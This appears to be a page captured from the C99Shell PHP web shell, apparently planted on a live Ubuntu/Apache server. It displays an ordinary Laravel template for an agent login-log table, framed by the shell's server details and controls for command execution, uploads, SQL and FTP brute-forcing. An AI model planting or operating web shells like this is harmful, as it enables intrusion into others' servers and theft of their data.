!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/resources/views/agent/   drwxr-xr-x
Free 13.25 GB of 57.97 GB (22.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     login_logs.blade.php (2.59 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.master')
@section('title') Agent Login Logs @endsection
@section('content')
@component('components.breadcrumb')
    @slot('li_1') Agent @endslot
    @slot('title')Login Logs @endslot
@endcomponent

<div class="row">
    <div class="col-lg-12">
        <div class="card">
            <div class="card-body">
                <h4 class="mb-3">Agent Login Logs</h4>
                <div class="table-responsive">
                    <table class="table table-bordered table-hover" id="loginLogTable">
                        <thead>
                            <tr>
                                <th>#</th>
                                <th>Agent ID</th>
                                <th>Agent Name</th>
                                <th>Device</th>
                                <!-- <th>Device Info</th> -->
                                <th>Type</th>
                                <th>Date/Time</th>
                            </tr>
                        </thead>
                        <tbody>
                            @foreach($logs as $i => $log)
                                <tr>
                                    <td>{{ $i + 1 }}</td>
                                    <td>{{ $log->user ? $log->user->agent_id : 'N/A' }}</td>
                                    <td>{{ $log->user ? $log->user->name : 'N/A' }}</td>
                                    <td>{{ $log->device == 1 ? 'Web Application' : 'Tab Application' }}</td>
                                    <!-- <td>{{ $log->device_info }}</td> -->
                                    <td>{{ ucfirst($log->type) }}</td>
                                    <td>{{ $log->created_at->setTimezone('Asia/Dhaka')->format('Y-m-d H:i:s') }}</td>
                                </tr>
                            @endforeach
                            @if($logs->isEmpty())
                                <tr>
                                    <td colspan="6" class="text-center">No logs found.</td>
                                </tr>
                            @endif
                        </tbody>
                    </table>
                </div>
                @if(method_exists($logs, 'links'))
                    <div class="mt-3">
                        {{ $logs->links() }}
                    </div>
                @endif
            </div>
        </div>
    </div>
</div>
@endsection

@section('script')
<script>
$(document).ready(function () {
    $('#loginLogTable').DataTable({
        order: [[5, 'desc']],
        pageLength: 25
    });
});
</script>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--